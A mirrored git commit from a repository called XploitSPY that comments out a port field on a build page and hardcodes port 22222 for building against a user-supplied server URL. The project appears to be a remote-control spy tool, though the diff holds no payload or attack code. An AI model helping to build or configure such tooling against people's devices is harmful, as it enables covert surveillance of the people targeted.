mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2025-01-01 18:45:34 +08:00
Fixed port mismatch
This commit is contained in:
parent
86b867d366
commit
29876c10eb
@ -25,10 +25,10 @@
|
|||||||
<input type="text" id="uriInput" placeholder="IP / Public URL" title="This is the public url of your server (domain.com)">
|
<input type="text" id="uriInput" placeholder="IP / Public URL" title="This is the public url of your server (domain.com)">
|
||||||
</div>
|
</div>
|
||||||
</div>
|
</div>
|
||||||
<div class="two wide field">
|
<!-- <div class="two wide field">
|
||||||
<label>:</label>
|
<label>:</label>
|
||||||
<input type="number" id="portInput" placeholder="PORT" min="2048" max="25565" title="This is the `control_port` set in the consts" value="<%= myPort %>">
|
<input type="number" id="portInput" placeholder="PORT" min="2048" max="25565" title="This is the `control_port` set in the consts" value="<%= myPort %>">
|
||||||
</div>
|
</div> -->
|
||||||
|
|
||||||
</div>
|
</div>
|
||||||
<div class="inline fields">
|
<div class="inline fields">
|
||||||
@ -71,7 +71,7 @@
|
|||||||
var isDone = false;
|
var isDone = false;
|
||||||
$('#gobuild').click((e) => {
|
$('#gobuild').click((e) => {
|
||||||
$('#dimmer').addClass('active');
|
$('#dimmer').addClass('active');
|
||||||
build($('#uriInput').val(), $('#portInput').val());
|
build($('#uriInput').val(), "22222");
|
||||||
setTimeout(loaderText, 500);
|
setTimeout(loaderText, 500);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user